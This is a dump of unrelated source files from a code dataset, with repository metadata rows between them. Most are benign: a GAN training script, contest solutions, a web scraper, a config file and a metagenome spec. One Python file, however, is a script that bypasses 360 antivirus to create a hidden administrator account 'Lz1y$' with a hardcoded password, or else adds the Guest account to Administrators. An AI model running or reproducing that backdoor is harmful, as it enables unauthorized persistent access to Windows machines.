y_labels = np.concatenate((real_labels, fake_labels))
# Label real and fake images
y = np.ones([2 * batch_size, 1])
y[batch_size:, :] = 0
# Train the Discriminator network
metrics = discriminator.train_on_batch(x, [y, y_labels])
loss = metrics[0]
accuracy = metrics[1]
log = "%d: [discriminator loss: %f, acc: %f]" % (i, loss, accuracy)
# Generate fake images and their labels
noise = np.random.uniform(-1.0, 1.0, size=[batch_size, latent_size])
fake_labels = np.eye(num_labels)[np.random.choice(num_labels,
batch_size)]
# Label fake images as real
y = np.ones([batch_size, 1])
# Train the Adversarial network
metrics = adversarial.train_on_batch([noise, fake_labels], [y, fake_labels])
loss = metrics[0]
accuracy = metrics[1]
log = "%s [adversarial loss: %f, acc: %f]" % (log, loss, accuracy)
print(log)
if (i + 1) % save_interval == 0:
if (i + 1) == train_steps:
show = True
else:
show = False
plot_images(generator,
noise_input=noise_input,
noise_class=noise_class,
show=show,
step=(i + 1),
model_name=model_name)
generator.save(model_name + ".h5")
def plot_images(generator,
noise_input,
noise_class,
show=False,
step=0,
model_name="gan"):
"""Generate fake images and plot them
For visualization purposes, generate fake images
then plot them in a square grid
# Arguments
generator (Model): The Generator Model for fake images generation
noise_input (ndarray): Array of z-vectors
show (bool): Whether to show plot or not
step (int): Appended to filename of the save images
model_name (string): Model name
"""
os.makedirs(model_name, exist_ok=True)
filename = os.path.join(model_name, "%05d.png" % step)
images = generator.predict([noise_input, noise_class])
print(model_name , " labels for generated images: ", np.argmax(noise_class, axis=1))
plt.figure(figsize=(2.2, 2.2))
num_images = images.shape[0]
image_size = images.shape[1]
rows = int(math.sqrt(noise_input.shape[0]))
for i in range(num_images):
plt.subplot(rows, rows, i + 1)
image = np.reshape(images[i], [image_size, image_size])
plt.imshow(image, cmap='gray')
plt.axis('off')
plt.savefig(filename)
if show:
plt.show()
else:
plt.close('all')
def build_and_train_models():
# MNIST dataset
(x_train, y_train), (_, _) = mnist.load_data()
image_size = x_train.shape[1]
x_train = np.reshape(x_train, [-1, image_size, image_size, 1])
x_train = x_train.astype('float32') / 255
num_labels = np.amax(y_train) + 1
y_train = to_categorical(y_train)
model_name = "acgan_mnist"
# Network parameters
latent_size = 100
batch_size = 64
train_steps = 40000
lr = 0.0002
decay = 6e-8
input_shape = (image_size, image_size, 1)
label_shape = (num_labels, )
# Build discriminator Model
inputs = Input(shape=input_shape, name='discriminator_input')
discriminator = build_discriminator(inputs, num_labels, image_size)
# [1] uses Adam, but discriminator converges easily with RMSprop
optimizer = RMSprop(lr=lr, decay=decay)
# 2 loss fuctions: 1) Probability image is real
# 2) Class label of the image
loss = ['binary_crossentropy', 'categorical_crossentropy']
discriminator.compile(loss=loss,
optimizer=optimizer,
metrics=['accuracy'])
discriminator.summary()
# Build generator model
input_shape = (latent_size, )
inputs = Input(shape=input_shape, name='z_input')
y_labels = Input(shape=label_shape, name='y_labels')
generator = build_generator(inputs, y_labels, image_size)
generator.summary()
# Build adversarial model = generator + discriminator
optimizer = RMSprop(lr=lr*0.5, decay=decay*0.5)
discriminator.trainable = False
adversarial = Model([inputs, y_labels],
discriminator(generator([inputs, y_labels])),
name=model_name)
adversarial.compile(loss=loss,
optimizer=optimizer,
metrics=['accuracy'])
adversarial.summary()
# Train discriminator and adversarial networks
models = (generator, discriminator, adversarial)
data = (x_train, y_train)
params = (batch_size, latent_size, train_steps, num_labels, model_name)
train(models, data, params)
def test_generator(generator, class_label=None):
noise_input = np.random.uniform(-1.0, 1.0, size=[16, 100])
step = 0
if class_label is None:
num_labels = 10
noise_class = np.eye(num_labels)[np.random.choice(num_labels, 16)]
else:
noise_class = np.zeros((16, 10))
noise_class[:,class_label] = 1
step = class_label
plot_images(generator,
noise_input=noise_input,
noise_class=noise_class,
show=True,
step=step,
model_name="test_outputs")
if __name__ == '__main__':
parser = argparse.ArgumentParser()
help_ = "Load generator h5 model with trained weights"
parser.add_argument("-g", "--generator", help=help_)
help_ = "Specify a specific digit to generate"
parser.add_argument("-d", "--digit", type=int, help=help_)
args = parser.parse_args()
if args.generator:
generator = load_model(args.generator)
class_label = None
if args.digit is not None:
class_label = args.digit
test_generator(generator, class_label)
else:
build_and_train_models()
| [
"rowel.atienza@gmail.com"
] | rowel.atienza@gmail.com |
12a7c034769b181f60b365d9088a81e33ef47347 | 15f321878face2af9317363c5f6de1e5ddd9b749 | /solutions_python/Problem_200/260.py | d0237b341a7b08a08d30d63213739e6e1ee988f4 | [] | no_license | dr-dos-ok/Code_Jam_Webscraper | c06fd59870842664cd79c41eb460a09553e1c80a | 26a35bf114a3aa30fc4c677ef069d95f41665cc0 | refs/heads/master | 2020-04-06T08:17:40.938460 | 2018-10-14T10:12:47 | 2018-10-14T10:12:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 773 | py | def good(numberStr):
numberList = map(int, list(numberStr))
length = len(numberList)
notYetFix = 0
for i in range(length - 1):
if numberList[i] < numberList[i+1]:
notYetFix = i+1
elif numberList[i] > numberList[i+1]:
break
elif i == length - 2 and numberList[i] == numberList[i+1]:
notYetFix = length - 1
if notYetFix != length - 1:
numberList[notYetFix] -= 1
for j in range(notYetFix+1, length):
numberList[j] = 9
resultList = map(str, numberList)
if resultList[0] == '0':
resultList[0] = ''
return ''.join(resultList)
n = int(raw_input())
for i in range(n):
input = raw_input().strip()
print "Case #{0}: {1}".format(i+1, good(input))
| [
"miliar1732@gmail.com"
] | miliar1732@gmail.com |
5fa492dd4548a8e0b896cfcc59dd262eb4d1a0b2 | 315b5795445848af093839214d7ce852b3080b66 | /Scrapy/tutorial/tutorial/spiders/quotes_spider.py | 89a646ff776c9e851e87e2a6ae5bb192d7aa9e63 | [] | no_license | yangyang0126/PythonSpider | 030657a04d91850c1bfe19a685f83e5dff670aeb | eb2b12557735eddf43603155a23bd582531c387d | refs/heads/master | 2021-06-25T16:21:39.561541 | 2021-03-31T11:03:17 | 2021-03-31T11:03:17 | 213,564,028 | 4 | 2 | null | null | null | null | UTF-8 | Python | false | false | 1,008 | py | # -*- coding: utf-8 -*-
"""
Created on Tue May 5 17:55:42 2020
@author: zhaoy
"""
import scrapy
class QuotesSpider(scrapy.Spider):
name = "quotes"
start_urls = [
'http://quotes.toscrape.com/page/1/',
'http://quotes.toscrape.com/page/2/',
]
def parse(self, response):
page = response.url.split("/")[-2]
filename = 'quotes-%s.html' % page
with open(filename, 'wb') as f:
f.write(response.body)
self.log('Saved file %s' % filename)
for quote in response.css('div.quote'):
yield {
'text': quote.css('span.text::text').get(),
'author': quote.css('small.author::text').get(),
'tags': quote.css('div.tags a.tag::text').getall(),
}
next_page = response.css('li.next a').attrib['href']
if next_page is not None:
yield scrapy.follow(next_page, callback=self.parse)
| [
"zhaojingyi0126@163.com"
] | zhaojingyi0126@163.com |
178fea7a115e8617e01db117b27aadc0ff3258ef | 2545252679e65a1912a56a8e6cfd3f3f8e26af87 | /virtualenv/Scripts/pilprint.py | fd424994966180548bd4c1b7369a7139513279fc | [] | no_license | tubbatun/customize-django-oscar-templates- | 796a1288cd18f12258c3c20958ce84e8fdb9af78 | 41404e4aa59aa36a4159034af7fab32a8b3b3263 | refs/heads/master | 2021-01-11T11:37:46.098571 | 2016-12-19T10:55:02 | 2016-12-19T10:55:02 | 76,853,932 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,642 | py | #!c:\users\sathi\desktop\tryoscar\virtualenv\scripts\python.exe
#
# The Python Imaging Library.
# $Id$
#
# print image files to postscript printer
#
# History:
# 0.1 1996-04-20 fl Created
# 0.2 1996-10-04 fl Use draft mode when converting.
# 0.3 2003-05-06 fl Fixed a typo or two.
#
from __future__ import print_function
import getopt
import os
import sys
import subprocess
VERSION = "pilprint 0.3/2003-05-05"
from PIL import Image
from PIL import PSDraw
letter = (1.0*72, 1.0*72, 7.5*72, 10.0*72)
def description(filepath, image):
title = os.path.splitext(os.path.split(filepath)[1])[0]
format = " (%dx%d "
if image.format:
format = " (" + image.format + " %dx%d "
return title + format % image.size + image.mode + ")"
if len(sys.argv) == 1:
print("PIL Print 0.3/2003-05-05 -- print image files")
print("Usage: pilprint files...")
print("Options:")
print(" -c colour printer (default is monochrome)")
print(" -d debug (show available drivers)")
print(" -p print via lpr (default is stdout)")
print(" -P <printer> same as -p but use given printer")
sys.exit(1)
try:
opt, argv = getopt.getopt(sys.argv[1:], "cdpP:")
except getopt.error as v:
print(v)
sys.exit(1)
printerArgs = [] # print to stdout
monochrome = 1 # reduce file size for most common case
for o, a in opt:
if o == "-d":
# debug: show available drivers
Image.init()
print(Image.ID)
sys.exit(1)
elif o == "-c":
# colour printer
monochrome = 0
elif o == "-p":
# default printer channel
printerArgs = ["lpr"]
elif o == "-P":
# printer channel
printerArgs = ["lpr", "-P%s" % a]
for filepath in argv:
try:
im = Image.open(filepath)
title = description(filepath, im)
if monochrome and im.mode not in ["1", "L"]:
im.draft("L", im.size)
im = im.convert("L")
if printerArgs:
p = subprocess.Popen(printerArgs, stdin=subprocess.PIPE)
fp = p.stdin
else:
fp = sys.stdout
ps = PSDraw.PSDraw(fp)
ps.begin_document()
ps.setfont("Helvetica-Narrow-Bold", 18)
ps.text((letter[0], letter[3]+24), title)
ps.setfont("Helvetica-Narrow-Bold", 8)
ps.text((letter[0], letter[1]-30), VERSION)
ps.image(letter, im)
ps.end_document()
if printerArgs:
fp.close()
except:
print("cannot print image", end=' ')
print("(%s:%s)" % (sys.exc_info()[0], sys.exc_info()[1]))
| [
"sathi@mahdil.com"
] | sathi@mahdil.com |
8b1d765af3d85bf9ff7d1ae97ba2b77b9ad6777e | 24d9f077593b33c707b12d3a00cf91750f740729 | /src/utils.py | 8efc2f56c796915263859578fe1363f3dbb0998e | [
"Apache-2.0"
] | permissive | xiaonanln/myleetcode-python | 274c8b8d7c29fd74dd11beb845180fb4e415dcd1 | 95d282f21a257f937cd22ef20c3590a69919e307 | refs/heads/master | 2021-01-22T21:45:59.786543 | 2019-04-21T15:24:23 | 2019-04-21T15:24:23 | 85,474,052 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,012 | py | import sys
def mdarray(initVal, *dims): return [initVal] * dims[0] if len(dims) == 1 else [ mdarray(initVal, *dims[1:]) for _ in xrange(dims[0])]
class ListNode:
def __init__(self, x):
self.val = x
self.next = None
def printlist(head):
n = head
vals = []
while n is not None:
vals.append(n.val)
n = n.next
print '->'.join(map(str, vals)) + '->[end]'
def makelist(*values):
if len(values) == 1 and isinstance(values[0], list):
values = values[0]
if not values: return None
head = None
prev = None
for val in values:
node = ListNode(val)
if head is None:
head = node
prev = node
else:
prev.next = node
prev = node
return head
class TreeNode:
def __init__(self, x):
self.val = x
self.left = None
self.right = None
def maketree(values):
if len(values) == 1 and isinstance(values[0], list):
values = values[0]
if not values: return None
root = TreeNode(values[0])
next = 1
deepest = [root]
while next < len(values):
assert deepest, (deepest, values)
new_deepest = []
for node in deepest:
node.left = TreeNode(values[next]) if next < len(values) and values[next] is not None else None
node.right = TreeNode(values[next+1]) if next+1 < len(values) and values[next+1] is not None else None
if node.left:
new_deepest.append(node.left)
if node.right:
new_deepest.append(node.right)
next += 2
deepest = new_deepest
return root
def printtree(root):
if root is None: print 'EMPTY TREE'
_printtree(root, 0)
def _printtree(root, level):
if root is None: return
print ('\t' * level) + str(root.val)
_printtree(root.left, level+1)
_printtree(root.right, level+1)
| [
"xiaonanln@gmail.com"
] | xiaonanln@gmail.com |
e7624008f621053eb84fcdeaba639ad1a2f74dcf | 4c68af90463865564ad710b4d50ad79c7e6ba5ac | /maintain_api/config.py | c37ba2c885f2bb7c0509d2b6d274b457830d751a | [
"MIT"
] | permissive | LandRegistry/maintain-api | d231f34105f594ea960327076a81bcd67a639a6c | fa1ecf71332b47606293c59eeaed8ae43d5231cd | refs/heads/master | 2020-04-03T21:16:28.830573 | 2018-10-26T14:45:00 | 2018-10-31T14:39:22 | 155,569,033 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 3,375 | py | import os
from urllib.parse import quote_plus
# RULES OF CONFIG:
# 1. No region specific code. Regions are defined by setting the OS environment variables appropriately to build up the
# desired behaviour.
# 2. No use of defaults when getting OS environment variables. They must all be set to the required values prior to the
# app starting.
# 3. This is the only file in the app where os.environ should be used.
# For logging
FLASK_LOG_LEVEL = os.environ['LOG_LEVEL']
# For health route
COMMIT = os.environ['COMMIT']
# This APP_NAME variable is to allow changing the app name when the app is running in a cluster. So that
# each app in the cluster will have a unique name.
APP_NAME = os.environ['APP_NAME']
# Mint API
MINT_API_URL = os.environ['MINT_API_URL']
MINT_API_URL_ROOT = os.environ['MINT_API_URL_ROOT']
# Search API URL
SEARCH_API_URL = os.environ['SEARCH_API_URL']
# Authentication
AUTHENTICATION_API_URL = os.environ['AUTHENTICATION_API_URL']
AUTHENTICATION_API_BASE_URL = os.environ['AUTHENTICATION_API_BASE_URL']
# --- Database variables start
# These must all be set in the OS environment.
# The password must be the correct one for either the app user or alembic user,
# depending on which will be used (which is controlled by the SQL_USE_ALEMBIC_USER variable)
SQL_HOST = os.environ['SQL_HOST']
SQL_DATABASE = os.environ['SQL_DATABASE']
SQL_PASSWORD = os.environ['SQL_PASSWORD']
APP_SQL_USERNAME = os.environ['APP_SQL_USERNAME']
ALEMBIC_SQL_USERNAME = os.environ['ALEMBIC_SQL_USERNAME']
if os.environ['SQL_USE_ALEMBIC_USER'] == 'yes':
FINAL_SQL_USERNAME = ALEMBIC_SQL_USERNAME
else:
FINAL_SQL_USERNAME = APP_SQL_USERNAME
SQLALCHEMY_DATABASE_URI = 'postgres://{0}:{1}@{2}/{3}'.format(
FINAL_SQL_USERNAME, quote_plus(SQL_PASSWORD), SQL_HOST, SQL_DATABASE)
SQLALCHEMY_TRACK_MODIFICATIONS = False # Explicitly set this in order to remove warning on run
SQLALCHEMY_POOL_RECYCLE = int(os.environ['SQLALCHEMY_POOL_RECYCLE'])
# --- Database variables end
STATUTORY_PROVISION_CACHE_TIMEOUT_MINUTES = os.environ['STATUTORY_PROVISION_CACHE_TIMEOUT_MINUTES']
MAX_HEALTH_CASCADE = os.environ['MAX_HEALTH_CASCADE']
DEPENDENCIES = {
"postgres": SQLALCHEMY_DATABASE_URI,
"mint-api": MINT_API_URL_ROOT,
"search-api": SEARCH_API_URL,
"authentication-api": AUTHENTICATION_API_BASE_URL
}
LOGCONFIG = {
'version': 1,
'disable_existing_loggers': False,
'formatters': {
'simple': {
'()': 'maintain_api.extensions.JsonFormatter'
},
'audit': {
'()': 'maintain_api.extensions.JsonAuditFormatter'
}
},
'filters': {
'contextual': {
'()': 'maintain_api.extensions.ContextualFilter'
}
},
'handlers': {
'console': {
'class': 'logging.StreamHandler',
'formatter': 'simple',
'filters': ['contextual'],
'stream': 'ext://sys.stdout'
},
'audit_console': {
'class': 'logging.StreamHandler',
'formatter': 'audit',
'filters': ['contextual'],
'stream': 'ext://sys.stdout'
}
},
'loggers': {
'maintain_api': {
'handlers': ['console'],
'level': FLASK_LOG_LEVEL
},
'audit': {
'handlers': ['audit_console'],
'level': 'INFO'
}
}
}
| [
"james.lademann@landregistry.gov.uk"
] | james.lademann@landregistry.gov.uk |
d200d0184ab94946218cf6520cfcdc3467b09255 | 54f352a242a8ad6ff5516703e91da61e08d9a9e6 | /Source Codes/AtCoder/arc087/A/3622945.py | a059d27d881c55058b7b747bc2cf9607e6321128 | [] | no_license | Kawser-nerd/CLCDSA | 5cbd8a4c3f65173e4e8e0d7ed845574c4770c3eb | aee32551795763b54acb26856ab239370cac4e75 | refs/heads/master | 2022-02-09T11:08:56.588303 | 2022-01-26T18:53:40 | 2022-01-26T18:53:40 | 211,783,197 | 23 | 9 | null | null | null | null | UTF-8 | Python | false | false | 651 | py | import sys
stdin = sys.stdin
sys.setrecursionlimit(10**5)
def li(): return map(int, stdin.readline().split())
def li_(): return map(lambda x: int(x)-1, stdin.readline().split())
def lf(): return map(float, stdin.readline().split())
def ls(): return stdin.readline().split()
def ns(): return stdin.readline().rstrip()
def lc(): return list(ns())
def ni(): return int(stdin.readline())
def nf(): return float(stdin.readline())
from collections import Counter
n = ni()
a = list(li())
cnt = Counter(a)
ans = 0
for k,v in cnt.items():
if v < k:
ans += v
elif v > k:
ans += (v-k)
print(ans) | [
"kwnafi@yahoo.com"
] | kwnafi@yahoo.com |
b5506cd71935af49e4d46d32e3ad9340f7b8ffa8 | 2b42b40ae2e84b438146003bf231532973f1081d | /spec/mgm4458101.3.spec | 27053690d85f2cf5bc6042987cc59427e5ca2c71 | [] | no_license | MG-RAST/mtf | 0ea0ebd0c0eb18ec6711e30de7cc336bdae7215a | e2ddb3b145068f22808ef43e2bbbbaeec7abccff | refs/heads/master | 2020-05-20T15:32:04.334532 | 2012-03-05T09:51:49 | 2012-03-05T09:51:49 | 3,625,755 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 14,309 | spec | {
"id": "mgm4458101.3",
"metadata": {
"mgm4458101.3.metadata.json": {
"format": "json",
"provider": "metagenomics.anl.gov"
}
},
"providers": {
"metagenomics.anl.gov": {
"files": {
"100.preprocess.info": {
"compression": null,
"description": null,
"size": 736,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458101.3/file/100.preprocess.info"
},
"100.preprocess.passed.fna.gz": {
"compression": "gzip",
"description": null,
"size": 657409,
"type": "fasta",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458101.3/file/100.preprocess.passed.fna.gz"
},
"100.preprocess.passed.fna.stats": {
"compression": null,
"description": null,
"size": 311,
"type": "fasta",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458101.3/file/100.preprocess.passed.fna.stats"
},
"100.preprocess.removed.fna.gz": {
"compression": "gzip",
"description": null,
"size": 31360,
"type": "fasta",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458101.3/file/100.preprocess.removed.fna.gz"
},
"100.preprocess.removed.fna.stats": {
"compression": null,
"description": null,
"size": 306,
"type": "fasta",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458101.3/file/100.preprocess.removed.fna.stats"
},
"205.screen.h_sapiens_asm.info": {
"compression": null,
"description": null,
"size": 450,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458101.3/file/205.screen.h_sapiens_asm.info"
},
"299.screen.info": {
"compression": null,
"description": null,
"size": 410,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458101.3/file/299.screen.info"
},
"299.screen.passed.fna.gcs": {
"compression": null,
"description": null,
"size": 1534,
"type": "fasta",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458101.3/file/299.screen.passed.fna.gcs"
},
"299.screen.passed.fna.gz": {
"compression": "gzip",
"description": null,
"size": 403251,
"type": "fasta",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458101.3/file/299.screen.passed.fna.gz"
},
"299.screen.passed.fna.lens": {
"compression": null,
"description": null,
"size": 388,
"type": "fasta",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458101.3/file/299.screen.passed.fna.lens"
},
"299.screen.passed.fna.stats": {
"compression": null,
"description": null,
"size": 311,
"type": "fasta",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458101.3/file/299.screen.passed.fna.stats"
},
"440.cluster.rna97.fna.gz": {
"compression": "gzip",
"description": null,
"size": 20639,
"type": "fasta",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458101.3/file/440.cluster.rna97.fna.gz"
},
"440.cluster.rna97.fna.stats": {
"compression": null,
"description": null,
"size": 309,
"type": "fasta",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458101.3/file/440.cluster.rna97.fna.stats"
},
"440.cluster.rna97.info": {
"compression": null,
"description": null,
"size": 947,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458101.3/file/440.cluster.rna97.info"
},
"440.cluster.rna97.mapping": {
"compression": null,
"description": null,
"size": 895056,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458101.3/file/440.cluster.rna97.mapping"
},
"440.cluster.rna97.mapping.stats": {
"compression": null,
"description": null,
"size": 49,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458101.3/file/440.cluster.rna97.mapping.stats"
},
"450.rna.expand.lca.gz": {
"compression": "gzip",
"description": null,
"size": 124640,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458101.3/file/450.rna.expand.lca.gz"
},
"450.rna.expand.rna.gz": {
"compression": "gzip",
"description": null,
"size": 44443,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458101.3/file/450.rna.expand.rna.gz"
},
"450.rna.sims.filter.gz": {
"compression": "gzip",
"description": null,
"size": 25875,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458101.3/file/450.rna.sims.filter.gz"
},
"450.rna.sims.gz": {
"compression": "gzip",
"description": null,
"size": 277984,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458101.3/file/450.rna.sims.gz"
},
"900.abundance.function.gz": {
"compression": "gzip",
"description": null,
"size": 6665,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458101.3/file/900.abundance.function.gz"
},
"900.abundance.lca.gz": {
"compression": "gzip",
"description": null,
"size": 5173,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458101.3/file/900.abundance.lca.gz"
},
"900.abundance.md5.gz": {
"compression": "gzip",
"description": null,
"size": 11111,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458101.3/file/900.abundance.md5.gz"
},
"900.abundance.ontology.gz": {
"compression": "gzip",
"description": null,
"size": 43,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458101.3/file/900.abundance.ontology.gz"
},
"900.abundance.organism.gz": {
"compression": "gzip",
"description": null,
"size": 16018,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458101.3/file/900.abundance.organism.gz"
},
"900.loadDB.sims.filter.seq": {
"compression": null,
"description": null,
"size": 9393968,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458101.3/file/900.loadDB.sims.filter.seq"
},
"900.loadDB.source.stats": {
"compression": null,
"description": null,
"size": 98,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458101.3/file/900.loadDB.source.stats"
},
"999.done.COG.stats": {
"compression": null,
"description": null,
"size": 1,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458101.3/file/999.done.COG.stats"
},
"999.done.KO.stats": {
"compression": null,
"description": null,
"size": 1,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458101.3/file/999.done.KO.stats"
},
"999.done.NOG.stats": {
"compression": null,
"description": null,
"size": 1,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458101.3/file/999.done.NOG.stats"
},
"999.done.Subsystems.stats": {
"compression": null,
"description": null,
"size": 1,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458101.3/file/999.done.Subsystems.stats"
},
"999.done.class.stats": {
"compression": null,
"description": null,
"size": 426,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458101.3/file/999.done.class.stats"
},
"999.done.domain.stats": {
"compression": null,
"description": null,
"size": 36,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458101.3/file/999.done.domain.stats"
},
"999.done.family.stats": {
"compression": null,
"description": null,
"size": 901,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458101.3/file/999.done.family.stats"
},
"999.done.genus.stats": {
"compression": null,
"description": null,
"size": 1354,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458101.3/file/999.done.genus.stats"
},
"999.done.order.stats": {
"compression": null,
"description": null,
"size": 487,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458101.3/file/999.done.order.stats"
},
"999.done.phylum.stats": {
"compression": null,
"description": null,
"size": 258,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458101.3/file/999.done.phylum.stats"
},
"999.done.rarefaction.stats": {
"compression": null,
"description": null,
"size": 22866,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458101.3/file/999.done.rarefaction.stats"
},
"999.done.sims.stats": {
"compression": null,
"description": null,
"size": 79,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458101.3/file/999.done.sims.stats"
},
"999.done.species.stats": {
"compression": null,
"description": null,
"size": 4979,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458101.3/file/999.done.species.stats"
}
},
"id": "mgm4458101.3",
"provider": "metagenomics.anl.gov",
"providerId": "mgm4458101.3"
}
},
"raw": {
"mgm4458101.3.fna.gz": {
"compression": "gzip",
"format": "fasta",
"provider": "metagenomics.anl.gov",
"url": "http://api.metagenomics.anl.gov/reads/mgm4458101.3"
}
}
} | [
"jared.wilkening@gmail.com"
] | jared.wilkening@gmail.com |
e85cfedc1dfff139224d07cd93ee4c56cca29c0d | 25279384025751b3b400aea006f164d66c167104 | /Sytem_demo/绕过360创建用户.py | 0905c44166dfef60318e16f76264d8548adfe5cc | [] | no_license | linruohan/my_study | 6fda0b49f4c671919ec7a7fc6ba596b49ec66e59 | 7666f93259495b6928751d50eb1bab114e118038 | refs/heads/master | 2020-03-28T18:26:47.776943 | 2018-09-17T05:52:17 | 2018-09-17T05:52:17 | 148,882,060 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,060 | py | import win32api
import win32net
import win32netcon
verbose_level = 0
server = None # Run on local machine.
def CreateUser():
"Creates a new test user, then deletes the user"
a = """#Author: Lz1y
#Blog:http://www.Lz1y.cn\n\n\n\n"""
print(a)
testName = "Lz1y$"
try:
win32net.NetUserDel(server, testName)
print("Warning - deleted user before creating it!")
except win32net.error:
pass
d = {}
d['name'] = testName
d['password'] = 'P@ssW0rd!!!'
d['priv'] = win32netcon.USER_PRIV_USER
d['comment'] = None
d['flags'] = win32netcon.UF_NORMAL_ACCOUNT | win32netcon.UF_SCRIPT
try:
win32net.NetUserAdd(server, 1, d)
print("CreateUser Successed!")
print("Username is "+testName)
LocalGroup(testName)
except:
print("Sorry,CreateUser Failed!")
print("Try to Change Guest!")
ChangeGuest()
def LocalGroup(uname=None):
"Creates a local group, adds some members, deletes them, then removes the group"
level = 3
if uname is None: uname="Lz1y$"
if uname.find("\\")<0:
uname = win32api.GetDomainName() + "\\" + uname
group = 'Administrators'
try:
u={'domainandname': uname}
win32net.NetLocalGroupAddMembers(server, group, level, [u])
mem, tot, res = win32net.NetLocalGroupGetMembers(server, group, level)
print("Add to Administrators Successd!"+'\n'+"Username:Lz1y$\npassword:P@ssW0rd!!!")
except:
print("Sorry,Add to Administrators Failed!")
def ChangeGuest():
level=3
uname="Guest"
group = 'Administrators'
try:
win32net.NetUserChangePassword(None,uname,"P@ssW0rd!!!","P@ssW0rd!!!")
u={'domainandname': uname}
win32net.NetLocalGroupAddMembers(server, group, level, [u])
mem, tot, res = win32net.NetLocalGroupGetMembers(server, group, level)
print("Change Guest Successd!"+'\n'+"Username:Guest\npassword:P@ssW0rd!!!")
except:
print("Change Guest Failed!Your priv must be System")
CreateUser() | [
"mjt1220@126.com"
] | mjt1220@126.com |
710ef00ecca7a2d4948cd6f3da2950555dda2974 | c2849586a8f376cf96fcbdc1c7e5bce6522398ca | /ch08/ex8-5.py | 2db05423dda3d46e39af01c7f937fdf5eb56bf12 | [] | no_license | freebz/Learning-Python | 0559d7691517b4acb0228d1cc76de3e93915fb27 | 7f577edb6249f4bbcac4f590908b385192dbf308 | refs/heads/master | 2020-09-23T01:48:24.009383 | 2019-12-02T12:26:40 | 2019-12-02T12:26:40 | 225,371,155 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 298 | py | # 리스트 메서드 호출
L = ['eat', 'more', 'SPAM!']
L.append('please') # 추가 메서드 호출: 끝에 아이템을 추가함
L
# ['eat', 'more', 'SPAM!', 'please']
L.sort() # 리스트 아이템 정렬('S' < 'e')
L
# ['SPAM!', 'eat', 'more', 'please']
| [
"freebz@hananet.net"
] | freebz@hananet.net |
3f660de7246377aed56171a5b3a247539393fa1e | ce8c59b637d024424d331c1b2b9df3bd9d91c5a5 | /tasks_8/homework/task_8_3.py | 51e6f1accb79e6ba49cc85ca9a9e18a851fb8e18 | [] | no_license | htmlprogrammist/kege-2021 | 7ca9155724e8041b807405d23391fb6503a7589b | 4fa3cd9a0cc4213bbdf4576894953452b256b56e | refs/heads/master | 2023-06-03T19:56:09.160795 | 2021-06-25T09:07:31 | 2021-06-25T09:07:31 | 308,915,777 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 801 | py | """
Вася составляет 4-буквенные коды из букв У, Л, Е, Й. Каждую букву нужно использовать ровно 1 раз,
при этом код не может начинаться с буквы Й и не может содержать сочетания ЕУ.
Сколько различных кодов может составить Вася?
"""
s = 'УЛЕЙ'
counter = 0
for a in s[:3]:
for b in s:
for c in s:
for d in s:
st = a + b + c + d
flag = True
for x in st:
if st.count(x) != 1:
flag = False
if flag:
if st.count('ЕУ') == 0:
counter += 1
print(counter)
| [
"badmaeve2511@gmail.com"
] | badmaeve2511@gmail.com |
